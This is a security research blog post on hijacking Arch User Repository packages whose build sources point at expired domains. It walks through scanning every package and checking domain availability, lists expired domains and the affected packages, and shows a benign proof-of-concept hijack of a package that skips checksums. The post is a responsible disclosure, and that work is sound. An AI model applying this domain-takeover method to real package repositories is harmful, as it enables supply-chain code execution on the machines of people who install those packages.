The Arch User Repository (AUR) is a software repository for Arch Linux. It differs from the official Arch Linux repositories in that its packages are provided by its users and not officially supported by Arch Linux.

The lack of support is more a feature than a bug, because it allows the AUR to contain packages that are difficult to support (e.g. because of licensing issues) or are only used by a handful of users. However, lack of support also means less quality control, which allows bad actors to introduce malicious packages. To warn users of this risk, the AUR has a big disclaimer on the front page:

DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

There are multiple ways to introduce a malicious package (or malicious changes to a legitimate package) into the AUR, for example by becoming the maintainer of an orphaned package (i.e. a package that is no longer supported by its previous maintainer) or by typosquatting popular package names.

Another option is to find packages that use URLs with expired domains during their build process, register the domain and host malicious files. How many packages are vulnerable to such an attack? Let’s find out!

PKGBUILD and SRCINFO files

The Arch Build System is the packaging system of Arch Linux. It is used for the official repositories, but also for the AUR. In the Arch Build System, packages consist of (at least) two files:

  1. PKGBUILD: A Bash script that defines variables and functions required to build and install a package. For example, the PKGBUILD of the zoom package:

     pkgname=zoom
     pkgver=5.12.2
     _subver=4816
     pkgrel=1
     pkgdesc="Video Conferencing and Web Conferencing Service"
     arch=('x86_64')
     license=('custom')
     url="https://zoom.us/"
     depends=('fontconfig' 'glib2' 'libpulse' 'libsm' 'ttf-font' 'libx11' 'libxtst' 'libxcb'
       'libxcomposite' 'libxfixes' 'libxi' 'libxcursor' 'libxkbcommon-x11' 'libxrandr'
       'libxrender' 'libxshmfence' 'libxslt' 'mesa' 'nss' 'xcb-util-image'
       'xcb-util-keysyms' 'dbus' 'libdrm')
     optdepends=('pulseaudio-alsa: audio via PulseAudio'
       'qt5-webengine: SSO login support'
       'ibus: remote control'
       'picom: extra compositor needed by some window managers for screen sharing'
       'xcompmgr: extra compositor needed by some window managers for screen sharing')
     options=(!strip)
     source=("${pkgname}-${pkgver}.${_subver}_orig_x86_64.pkg.tar.xz"::"https://cdn.zoom.us/prod/${pkgver}.${_subver}/zoom_x86_64.pkg.tar.xz")
     sha512sums=('1b7f28dedfa78998e7b36f12b16e21d79bd1a6ac2055abeb04c61ca22ffb688953f92bfdc5d7e9fd489b6b8baa936fa5fec1c78c53a085c5c9d668da436570c3')
    
     prepare() {
       sed -i 's/Zoom\.png/Zoom/g' "${srcdir}/usr/share/applications/Zoom.desktop"
       sed -i 's/StartupWMClass=Zoom/StartupWMClass=zoom/g' "${srcdir}/usr/share/applications/Zoom.desktop"
     }
    
     package() {
       cp -dpr --no-preserve=ownership opt usr "${pkgdir}"
     }
    
  2. .SRCINFO: A static file containing the metadata of a package (generated from the PKGBUILD file) as key-value pairs. For example, the .SRCINFO of the zoom package:

     pkgbase = zoom
       pkgdesc = Video Conferencing and Web Conferencing Service
       pkgver = 5.12.2
       pkgrel = 1
       url = https://zoom.us/
       arch = x86_64
       license = custom
       depends = fontconfig
       depends = glib2
       depends = libpulse
       depends = libsm
       depends = ttf-font
       depends = libx11
       depends = libxtst
       depends = libxcb
       depends = libxcomposite
       depends = libxfixes
       depends = libxi
       depends = libxcursor
       depends = libxkbcommon-x11
       depends = libxrandr
       depends = libxrender
       depends = libxshmfence
       depends = libxslt
       depends = mesa
       depends = nss
       depends = xcb-util-image
       depends = xcb-util-keysyms
       depends = dbus
       depends = libdrm
       optdepends = pulseaudio-alsa: audio via PulseAudio
       optdepends = qt5-webengine: SSO login support
       optdepends = ibus: remote control
       optdepends = picom: extra compositor needed by some window managers for screen sharing
       optdepends = xcompmgr: extra compositor needed by some window managers for screen sharing
       options = !strip
       source = zoom-5.12.2.4816_orig_x86_64.pkg.tar.xz::https://cdn.zoom.us/prod/5.12.2.4816/zoom_x86_64.pkg.tar.xz
       sha512sums = 1b7f28dedfa78998e7b36f12b16e21d79bd1a6ac2055abeb04c61ca22ffb688953f92bfdc5d7e9fd489b6b8baa936fa5fec1c78c53a085c5c9d668da436570c3
    
     pkgname = zoom
    

As we are interested in the URLs of the installation files of a package, we are looking for the source variable. The source variable defines the URLs (and filenames) of the necessary installation files. During installation, the files listed in source are downloaded and installed (using functions provided in the PKGBUILD). For example, Zoom has one source: https://cdn.zoom.us/prod/5.12.2.4816/zoom_x86_64.pkg.tar.xz.

Packages can define multiple URLs and filenames in the source variables. Packages can also specify architecture-specific sources by using an architecture-specific array (e.g. source_x86_64).
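
To make this concrete, here is a minimal sketch of how the source entries could be pulled out of a .SRCINFO file. The function name parse_srcinfo_sources is our own and not part of any Arch tooling, and the parsing only assumes the "key = value" layout shown above, with an optional "filename::" prefix in front of the URL:

```python
def parse_srcinfo_sources(srcinfo_text):
    """Return the source entries of a .SRCINFO file as (key, filename, location) tuples."""
    sources = []
    for line in srcinfo_text.splitlines():
        key, sep, value = line.partition("=")
        key, value = key.strip(), value.strip()
        # Match "source" as well as architecture-specific keys such as "source_x86_64".
        if not sep or not (key == "source" or key.startswith("source_")):
            continue
        # An optional "filename::" prefix renames the downloaded file.
        filename, has_prefix, location = value.partition("::")
        if not has_prefix:
            filename, location = None, value
        sources.append((key, filename, location))
    return sources


zoom_srcinfo = """
pkgbase = zoom
	pkgver = 5.12.2
	source = zoom-5.12.2.4816_orig_x86_64.pkg.tar.xz::https://cdn.zoom.us/prod/5.12.2.4816/zoom_x86_64.pkg.tar.xz
"""
for key, filename, location in parse_srcinfo_sources(zoom_srcinfo):
    print(key, filename, location)
```

Entries without a URL scheme (local files that ship next to the PKGBUILD) come back with the plain filename as their location, so they still need to be filtered out before looking at domains.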

Getting all .SRCINFO files

At the time of writing, there are 85793 packages in the AUR (the AUR provides a list of all packages at https://aur.archlinux.org/packages.gz). We will need to somehow get the .SRCINFO for each of them.
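
As a rough sketch, the package list can be read with nothing but the Python standard library. The helper name parse_package_list is ours, and we assume the file holds one package name per line, possibly with "#" comment lines, which may not match the exact format the AUR serves:

```python
import gzip


def parse_package_list(gz_bytes):
    """Return the package names contained in a gzip-compressed package list."""
    text = gzip.decompress(gz_bytes).decode("utf-8")
    names = []
    for line in text.splitlines():
        line = line.strip()
        # Assumption: blank lines and "#" comment lines are not package names.
        if line and not line.startswith("#"):
            names.append(line)
    return names


# Possible usage (needs network access, so it is left commented out):
# from urllib.request import urlopen
# with urlopen("https://aur.archlinux.org/packages.gz") as response:
#     print(len(parse_package_list(response.read())))
```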

The AUR has an API. However, the API has a rate limit of 4000 requests per day (per IP address), making it unsuited for getting a full copy of the AUR.

Luckily, since July of this year, Arch Linux provides an official mirror of the AUR on GitHub. This is a huge repository (with a whopping 106670 branches) that we can clone to get a full local copy of the AUR (i.e. the PKGBUILD and .SRCINFO files of all packages). We can then use a library like GitPython to automatically traverse the Git repository and get the .SRCINFO file for each package:

from git import Repo

repo = Repo("data/repos/aur")
refs = repo.remote().refs

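for ref in refs:
    # Remote refs are named "<remote>/<package>"; keep only the package name.
    package_name = ref.name.split("/")[-1]

    if package_name in ("HEAD", "master"):
        continue

    # Read .SRCINFO from the tree of the commit at the tip of the package branch.
    srcinfo = ref.commit.tree[".SRCINFO"].data_stream.read()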

    # In this example, we just print the .SRCINFO data,
    # but we could save them (e.g. as files or in a database) for further analysis.
    print(package_name)
    print(srcinfo)

Finding Expired Domains

Now that we have all .SRCINFO files, we can easily iterate through them and get the value of each source variable (and each architecture-specific source variable).

The source variable defines not only the domain where a source file can be found, but also the URI scheme (e.g. HTTPS) to use. As some packages use sources with esoteric URI schemes (e.g. gogdownloader:// in gog-unreal-tournament-goty) and other packages have typos in their source schemes (e.g. yhttps:// in emacs-d-mode), we only consider the following protocols:

  • HTTPS (55047 sources)
  • Git (2430 sources)
    • Git over HTTPS (28094 sources)
    • Git over HTTP (225 sources)
  • HTTP (12706 sources)
  • FTP (483 sources)
  • SVN (81 sources)
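
A tally like the one above could be produced along these lines. This is only a sketch: the SCHEME_LABELS mapping is our guess at how sources were grouped (in particular, that "git+https://" sources count as Git over HTTPS), and the function names are hypothetical:

```python
from collections import Counter
from urllib.parse import urlparse

# Assumed mapping from URI scheme to the labels used in the list above.
# Anything else (typos, esoteric schemes, local files) is ignored.
SCHEME_LABELS = {
    "https": "HTTPS",
    "git": "Git",
    "git+https": "Git over HTTPS",
    "git+http": "Git over HTTP",
    "http": "HTTP",
    "ftp": "FTP",
    "svn": "SVN",
}


def source_scheme(source):
    """Return the lower-cased URI scheme of a source entry ('' for local files)."""
    # Drop an optional "filename::" prefix before parsing the URL.
    location = source.split("::", 1)[-1]
    return urlparse(location).scheme.lower()


def count_schemes(sources):
    """Count the sources per label, skipping schemes that are not in SCHEME_LABELS."""
    counts = Counter()
    for source in sources:
        label = SCHEME_LABELS.get(source_scheme(source))
        if label is not None:
            counts[label] += 1
    return counts
```

Because unknown schemes are simply dropped, a typo such as yhttps:// never reaches the later domain checks.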

We parse the domains from all these sources (using urlparse and tldextract) to find 6926 unique domains and 5332 unique root domains. As we are looking for expired domains, we only care about root domains.
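
The hostname part of this step can be sketched with urlparse alone. Note that naive_root_domain below is a deliberate simplification of ours: it keeps the last two labels of a hostname, which is wrong for multi-label suffixes such as co.uk. That is exactly the case a public-suffix-aware library like tldextract handles, so treat this as an illustration rather than a replacement:

```python
from urllib.parse import urlparse


def source_hostname(source):
    """Return the hostname of a source entry, or None for local files."""
    location = source.split("::", 1)[-1]  # drop an optional "filename::" prefix
    return urlparse(location).hostname


def naive_root_domain(hostname):
    """Keep the last two labels of a hostname (simplification, see the note above)."""
    labels = hostname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def root_domains(sources):
    """Collect the unique (naively computed) root domains of all remote sources."""
    domains = set()
    for source in sources:
        hostname = source_hostname(source)
        if hostname:
            domains.add(naive_root_domain(hostname))
    return domains
```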

Unfortunately, there is no standardized way to check if a domain is available. The WHOIS responses from most popular TLDs contain something like “No match for domain” for available domains, but this is not true for all TLDs. A good first step is to filter out any domains that have a DNS A record set, as those domains will (most likely) still be in use. To quickly perform many DNS requests we use blechschmidt/massdns. This is a great tool that allows us to resolve thousands of domains in seconds:

# --output J:        write the results as JSON
# --ignore NOERROR:  do not output responses with status NOERROR (i.e. domains that resolve)
# -r data/resolvers: use 1.1.1.1, 8.8.8.8 and 8.8.4.4 as DNS resolvers
$ massdns \
  --output J \
  --ignore NOERROR \
  --outfile data/dns-output-root-domains.txt \
  -r data/resolvers \
  data/root-domains.txt
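
The resulting file can then be reduced to a list of candidate domains. The sketch below assumes that the JSON output holds one object per line with a "name" and a "status" field. That layout is an assumption on our part and should be checked against the output of your massdns version. The function name is hypothetical:

```python
import json


def non_resolving_domains(ndjson_text):
    """Map each domain to its DNS status for every record that is not NOERROR."""
    domains = {}
    for line in ndjson_text.splitlines():
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        # Assumed field names: "name" (queried domain) and "status" (DNS response code).
        status = record.get("status")
        if status and status != "NOERROR":
            # DNS names are usually written with a trailing dot; strip it.
            domains[record["name"].rstrip(".")] = status
    return domains


# Possible usage, with the output file from the command above:
# with open("data/dns-output-root-domains.txt") as handle:
#     print(non_resolving_domains(handle.read()))
```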

After this, we are left with only 44 domains that do not have an A record associated with them. We can either manually check the WHOIS records for these domains or use some domain availability API (e.g. Domainr) to check if a domain has expired.

After filtering out some false positives, we are left with 14 expired domains that are used in 20 packages:

#    Domain                  Packages
0    acidhub.click           firefox-vacuum, gvim-checkpath, wine-pixi2, xcursor-theme-wii
1    alunamation.com         lightzone-free
2    chugunkov.website       scalafmt-native
3    cqp.im                  coolq-pro-bin
4    crankysupertoon.live    gmedit-bin, mesen-s-bin
5    danym.org               polly-b-gone
6    erwiz.de                erwiz
7    hostedinspace.de        totd
8    kygekteam.org           kygekteampmmp4
9    relatif.moi             servicewall-git
10   semi.works              amuletml-bin
11   syw4e.info              etherdump
12   tc.ink                  nap-bin
13   yugioh.vip              iscfpc, iscfpc-aarch64, iscfpcx

Checksums

Are all of these 20 packages hijackable by just registering the expired domains? No, because the Arch Build System has built-in checksum verification.

PKGBUILD files need to contain a hash (either CRC32, MD5, SHA-1, SHA-256, SHA-224, SHA-384, SHA-512 or BLAKE2) of each source that will be used to check the integrity of the source files during installation. If a source does not match the provided hash, the installation will abort.

This means that if we register an expired domain used by a package, we cannot host arbitrary files and expect them to be successfully installed. They would have to match the hash value.
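
Conceptually, the check boils down to hashing the downloaded file and comparing the digest with the value from the PKGBUILD. The following is a simplified sketch of that idea using hashlib, not makepkg's actual implementation. The names HASHLIB_NAMES and matches_checksum are ours, and the CRC-based cksums array is left out because hashlib has no equivalent for it:

```python
import hashlib

# Assumed mapping from PKGBUILD checksum arrays to hashlib algorithm names.
HASHLIB_NAMES = {
    "md5sums": "md5",
    "sha1sums": "sha1",
    "sha224sums": "sha224",
    "sha256sums": "sha256",
    "sha384sums": "sha384",
    "sha512sums": "sha512",
    "b2sums": "blake2b",
}


def matches_checksum(data, array_name, expected_hex):
    """Return True if the digest of `data` equals the expected hex digest."""
    digest = hashlib.new(HASHLIB_NAMES[array_name], data).hexdigest()
    return digest == expected_hex.lower()


original = b"original file contents\n"
expected = hashlib.sha256(original).hexdigest()
print(matches_checksum(original, "sha256sums", expected))
print(matches_checksum(b"replaced by an attacker\n", "sha256sums", expected))
```

A file served from a re-registered domain only passes this check if it is byte-for-byte identical to the file the maintainer hashed.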

There are no practical pre-image attacks against any of these hashes. The notable exception is CRC32, which is not a cryptographic hash but an error-detecting code; however, CRC32 is only used by 16 packages. So we need to find a way around the checksum verification altogether:

  • Users can skip the checksum verification when installing packages by passing the --skipinteg or the --skipchecksums option to makepkg (the command that builds packages from PKGBUILD files).

  • Package maintainers can bypass the checksum verification for specific sources by using SKIP instead of actual hashes. This tells makepkg to skip the integrity check for that particular source. For example, the 2048-curses package does not verify the integrity of its sources:

      pkgname=2048-curses
      pkgver=1.2
      pkgrel=0
      pkgdesc="Curses based popular game 2048 written in C"
      arch=('x86_64' 'aarch64' 'armv7h')
      url="https://github.com/theretikgm/2048-curses"
      license=('GPL')
      depends=('ncurses>=6.0-0' 'git')
      source=("git+https://github.com/theretikgm/2048-curses.git")
      sha256sums=('SKIP')
      build() {
        cd "${srcdir}/${pkgname}/src"
        make
      }
    
      package() {
        install "${srcdir}/${pkgname}/src/${pkgname}" -D "${pkgdir}/usr/bin/${pkgname}"
      }
    

The use of SKIP is quite common. We counted 30245 packages (35.25% of the total) that use SKIP for at least one source. A significant portion of these use a Git repository (or some other VCS) directly as their source, which means that they have to use SKIP (or update the PKGBUILD with new hashes for every new commit). For example, 21278 of the packages that use SKIP (24.80% of all packages) have a name that ends with “-git”.
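
Spotting SKIP in a .SRCINFO file is straightforward. Here is one way it could be done, assuming that checksum keys end in "sums" (optionally followed by an architecture suffix such as _x86_64). The function name is our own:

```python
def skipped_checksum_keys(srcinfo_text):
    """Return the checksum keys of a .SRCINFO file whose value is SKIP."""
    skipped = []
    for line in srcinfo_text.splitlines():
        key, sep, value = line.partition("=")
        key, value = key.strip(), value.strip()
        # "sha256sums_x86_64" -> "sha256sums": drop an architecture suffix, if any.
        base = key.split("_", 1)[0]
        if sep and base.endswith("sums") and value == "SKIP":
            skipped.append(key)
    return skipped


example = """
pkgbase = 2048-curses
	source = git+https://github.com/theretikgm/2048-curses.git
	sha256sums = SKIP
"""
print(skipped_checksum_keys(example))
```

A package counts as using SKIP for at least one source whenever this list is non-empty.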

Four of the 20 packages that we found use SKIP instead of actual hashes (we submitted deletion requests for all of them). Installing these packages is dangerous, because not only do they use sources with expired domains, but they also do not verify the integrity of any files downloaded from those domains.

As an aside, this is the number of uses of each hash type we counted (excluding SKIP values):

Hash       # of uses   % of total
SHA-256    54193       53.11%
MD5        25703       25.19%
SHA-512    13578       13.31%
SHA-1      4676        4.58%
BLAKE2     3682        3.61%
SHA-384    159         0.16%
SHA-224    31          0.03%
CRC32      16          0.02%

A Proof-of-Concept Package Hijack

Now that we have found four vulnerable packages, we will perform a proof-of-concept attack to show how such an attack would work. We anonymized the package name and domain by replacing them with vulnerable-package and vulnerable-package.org, respectively.

Disclaimer: I understand that the applied anonymization is not strong and anyone that wants to find the vulnerable package will find it. I decided to publish this proof-of-concept attack, because: (a) it shows that this attack is possible on real-world packages, (b) package information is public and anybody that wants to find similarly vulnerable packages can do so, (c) the package is by definition broken and unused and (d) I notified the AUR by sending deletion requests.

The PKGBUILD of vulnerable-package looks like this:

pkgname=vulnerable-package
pkgver=4.0.0
pkgrel=2
pkgdesc="anonymized"
arch=(x86_64)
license=('GPL')
source=("https://jenkins.vulnerable-package.org/view/anonymized/job/anonymized-PHP-Binary/lastSuccessfulBuild/artifact/Linux/PHP_Linux-x86_64.tar.gz"
	"https://jenkins.vulnerable-package.org/view/anonymized/job/anonymized/lastSuccessfulBuild/artifact/start.sh"
)
sha256sums=('0ad82a11eb37ae6caddbf5d6a09a6d2e257cce3cbf5ff55e4a7465c5cf38e348'
            '601551a70f27acbf4214570532ede9eed011e0382a142e30b883ac7847b3cf51')

package() {
	mkdir $pkgdir/vulnerable-package
	cd $pkgdir/vulnerable-package
	rm $srcdir/PHP_Linux-x86_64.tar.gz
	cp -R $srcdir/* .
	chmod +x start.sh
}
sha256sums=('SKIP'
            'SKIP')

In short, this PKGBUILD downloads two files (PHP_Linux-x86_64.tar.gz and start.sh) from https://jenkins.vulnerable-package.org/ and copies them to the /vulnerable-package/ directory.

We can see that actual SHA-256 hashes are present, but they are overridden at the end with SKIP values.
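
This works because a PKGBUILD is a Bash script: a later assignment to the same array simply replaces the earlier one. A pattern like this could be flagged with a rough heuristic such as the one below. It is a regex-based sketch of ours that does not execute or fully parse Bash, so it can miss assignments made inside functions or conditionals:

```python
import re
from collections import Counter

# Matches plain assignments such as "sha256sums=(" or "md5sums_x86_64=(" at the
# start of a line. Appends ("+=") are not matched, as they do not replace anything.
CHECKSUM_ASSIGNMENT = re.compile(
    r"^[ \t]*((?:ck|md5|sha1|sha224|sha256|sha384|sha512|b2)sums(?:_\w+)?)=\(",
    re.MULTILINE,
)


def reassigned_checksum_arrays(pkgbuild_text):
    """Return the checksum arrays that are assigned more than once in a PKGBUILD."""
    counts = Counter(CHECKSUM_ASSIGNMENT.findall(pkgbuild_text))
    return sorted(name for name, count in counts.items() if count > 1)


example = """
sha256sums=('0ad82a11...'
            '60155170...')
package() {
	chmod +x start.sh
}
sha256sums=('SKIP'
            'SKIP')
"""
print(reassigned_checksum_arrays(example))
```

The hash values in the example are shortened placeholders; only the repeated assignment matters for the check.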

Hijacking the Package

The first step in this attack is to buy and register vulnerable-package.org. This is easy enough and only costs about 10 bucks.

Next, we need a way to host files on our new domain. For this we can use a server we own or use a static content hosting provider like GitHub Pages or Cloudflare Pages.

Finally, we need two files that match the path and filenames of the files that are downloaded during the installation:

  1. view/anonymized/job/anonymized-PHP-Binary/lastSuccessfulBuild/artifact/Linux/PHP_Linux-x86_64.tar.gz
  2. view/anonymized/job/anonymized/lastSuccessfulBuild/artifact/start.sh

We leave the first file empty and add the following (benign) content to start.sh:

#! /usr/bin/env bash
echo "[+] Code Execution"

Installing and Executing the Hijacked Package

When a victim installs the hijacked package, nothing out of the ordinary happens. Files are downloaded, verified and installed:

Note: yay is a popular AUR helper, a program that automates installing AUR packages.

$ yay -Sy vulnerable-package
:: Synchronizing package databases...
 core is up to date
 extra is up to date
 community is up to date
 multilib is up to date
:: Checking for conflicts...
:: Checking for inner conflicts...
[Aur:1]  vulnerable-package-4.0.0-2

:: (1/1) Downloaded PKGBUILD: vulnerable-package
  1 vulnerable-package                        (Build Files Exist)
==> Diffs to show?
==> [N]one [A]ll [Ab]ort [I]nstalled [No]tInstalled or (1 2 3, 1-3, ^4)
==>
:: (1/1) Parsing SRCINFO: vulnerable-package

==> Making package: vulnerable-package 4.0.0-2
==> Retrieving sources...
  -> Downloading PHP_Linux-x86_64.tar.gz...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100     1  100     1    0     0      4      0 --:--:-- --:--:-- --:--:--     4
  -> Downloading start.sh...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    48  100    48    0     0    247      0 --:--:-- --:--:-- --:--:--   250
==> Validating source files with sha256sums...
    PHP_Linux-x86_64.tar.gz ... Skipped
    start.sh ... Skipped
==> Making package: vulnerable-package 4.0.0-2
==> Checking runtime dependencies...
==> Checking buildtime dependencies...
==> Retrieving sources...
  -> Found PHP_Linux-x86_64.tar.gz
  -> Found start.sh
==> Validating source files with sha256sums...
    PHP_Linux-x86_64.tar.gz ... Skipped
    start.sh ... Skipped
==> Removing existing $srcdir/ directory...
==> Extracting sources...
==> Sources are ready.
==> Making package: vulnerable-package 4.0.0-2
==> Checking runtime dependencies...
==> Checking buildtime dependencies...
==> WARNING: Using existing $srcdir/ tree
==> Entering fakeroot environment...
==> Starting package()...
==> Tidying install...
  -> Removing libtool files...
  -> Purging unwanted files...
  -> Removing static library files...
  -> Stripping unneeded symbols from binaries and libraries...
  -> Compressing man and info pages...
==> Checking for packaging issues...
==> Creating package "vulnerable-package"...
  -> Generating .PKGINFO file...
  -> Generating .BUILDINFO file...
  -> Generating .MTREE file...
  -> Compressing package...
==> Leaving fakeroot environment.
==> Finished making: vulnerable-package 4.0.0-2
==> Cleaning up...
loading packages...
resolving dependencies...
looking for conflicting packages...

Packages (1) vulnerable-package-4.0.0-2

:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring
(1/1) checking package integrity
(1/1) loading package files
(1/1) checking for file conflicts
(1/1) checking available disk space
:: Processing package changes...
(1/1) installing vulnerable-package

But when they run the software they just installed, it actually runs our files:

$ /vulnerable-package/start.sh
[+] Code Execution
$ cat /vulnerable-package/start.sh
#! /usr/bin/env bash
echo "[+] Code Execution"

In this fictitious scenario, we have successfully gained arbitrary code execution on a victim system!

Discussion

In this blog post we have shown that it is possible to hijack AUR packages by targeting the domains used in the installation process of those packages. Hijacking AUR packages is not a new concept. As we said in the introduction, hijacking AUR packages has always been possible (in multiple ways) and is a known risk.

However, hijacking a package by registering domains is harder to detect than other methods, because the change of domain ownership is not registered by the AUR (unlike a malicious change to a PKGBUILD file).

In the end we found 4 (out of 85793 total) packages that are vulnerable to this attack. These packages are installed by only a handful of users, if any, because they are broken by definition. This shows that this attack is feasible, but not practical.

The best way to protect against this kind of attack is to enforce the integrity of source files by setting hash values. We saw that this is, unfortunately, not done for a significant portion (35%) of packages.

To help make the AUR (slightly) safer, I have submitted deletion requests for all the vulnerable packages.

Update: All vulnerable packages have been deleted.

What About the Official Repositories?

The official Arch Linux repositories also use the Arch Build System, and there are also GitHub mirrors available for these repositories.

Luckily, these have a higher level of quality control, and we did not find any expired domains in them.